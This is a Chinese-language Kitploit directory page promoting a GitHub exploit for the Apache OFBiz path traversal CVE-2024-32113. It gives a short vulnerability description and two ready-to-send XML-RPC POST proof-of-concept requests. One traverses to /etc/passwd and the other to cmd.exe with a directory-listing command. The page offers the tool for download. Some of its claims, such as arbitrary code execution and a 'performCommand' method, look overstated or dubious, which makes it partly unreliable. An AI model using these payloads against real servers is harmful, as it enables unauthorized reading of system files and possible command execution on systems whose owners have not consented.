Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露Web安全渗透测试
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

针对 Apache OFBiz CVE-2024-32113 的漏洞利用,通过特制的 XML-RPC 请求实现路径遍历,可在存在漏洞的服务器上实现任意文件读取及潜在的命令执行。

查看仓库
16342年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Apache-OFBiz-Directory-Traversal-exploit

在 Apache OFBiz 18.12.12 及之前版本中发现了一个被归类为严重的漏洞。该问题影响的是一个未知功能。通过对未知输入的操作导致了路径遍历漏洞。产品使用外部输入来构造路径名,该路径名旨在标识受限制父目录下的文件或目录,但产品未能正确中和路径名中的特殊元素,这些元素可能导致路径名解析到受限制目录之外的位置。受影响的是机密性、完整性和可用性。

介绍

  • CVE-2024-32113 漏洞允许攻击者通过发送特制的HTTP请求在Apache OFBiz服务器上执行任意代码。
  • 在此请求中,攻击者使用参数 ../../../../../../etc/passwd 来指向Apache OFBiz服务器上的 etc/passwd 文件。
  • 当Apache OFBiz服务器处理此请求时,它将尝试读取 etc/passwd 文件,该文件包含服务器上用户的敏感信息。
  • 这些信息可用于对服务器实施进一步攻击,例如窃取数据、修改数据,甚至删除数据。

Poc

1-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

或

2-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
下载工具